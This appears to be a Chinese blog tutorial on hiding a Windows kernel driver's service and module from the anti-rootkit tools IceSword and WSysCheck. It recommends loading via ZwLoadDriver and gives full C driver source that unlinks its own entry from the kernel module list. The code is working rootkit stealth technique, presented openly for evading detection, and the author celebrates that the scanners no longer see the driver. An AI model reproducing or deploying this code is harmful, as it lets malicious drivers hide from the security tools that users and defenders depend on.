驱动的加载、隐藏模块和服务

1隐藏服务
驱动的加载一般有三种方式:
OpenSCManager
ZwLoadDriver
ZwSetSystemInformation
这里我们用ZwLoadDriver来加载驱动程序.便可以隐藏服务了,没试其他,冰刃和WSysCheck就看不到我们的服务了

2隐藏模块
摘链,注意加载驱动用ZwLoadDriver不要用OpenSCManager,否则如下图一样:

驱动代码比较简单

01 #include "ntddk.h"
02 typedef unsigned long DWORD;
03 typedef DWORD* PDWORD;
04 typedef struct _DRIVER_DATA
05 {
06 LIST_ENTRY listEntry;
07 DWORD unknown1;
08 DWORD unknown2;
09 DWORD unknown3;
10 DWORD unknown4;
11 DWORD unknown5;
12 DWORD unknown6;
13 DWORD unknown7;
14 UNICODE_STRING path;
15 UNICODE_STRING name;
16 } DRIVER_DATA;
17 VOID OnUnload( IN PDRIVER_OBJECT pDriverObject )
18 {
19 DbgPrint("OnUnload called.");
20 }
21 NTSTATUS DriverEntry( IN PDRIVER_OBJECT pDriverObject, IN PUNICODE_STRING theRegistryPath )
22 {
23
24 DRIVER_DATA* driverData;
25 driverData = *((DRIVER_DATA**)((DWORD)pDriverObject + 20));
26 if( driverData != NULL )
27 {
28 *((PDWORD)driverData->listEntry.Blink) = (DWORD)driverData->listEntry.Flink;
29 driverData->listEntry.Flink->Blink = driverData->listEntry.Blink;
30 DbgPrint("Sucessfull.\n");
31 }
32 pDriverObject->DriverUnload = OnUnload;
33 return STATUS_SUCCESS;
34 }

加载驱动后,我们用DbgView看到打出的Sucessfull就知道我们的驱动已经运行了...然后用冰刃的查看模块,服务..好像没什么动静...he8he8
下面的图是用OpenSCManager加载驱动的效果....所以不要用OpenSCManager加载,用ZwLoadDriver加载,这样冰刃才查不出来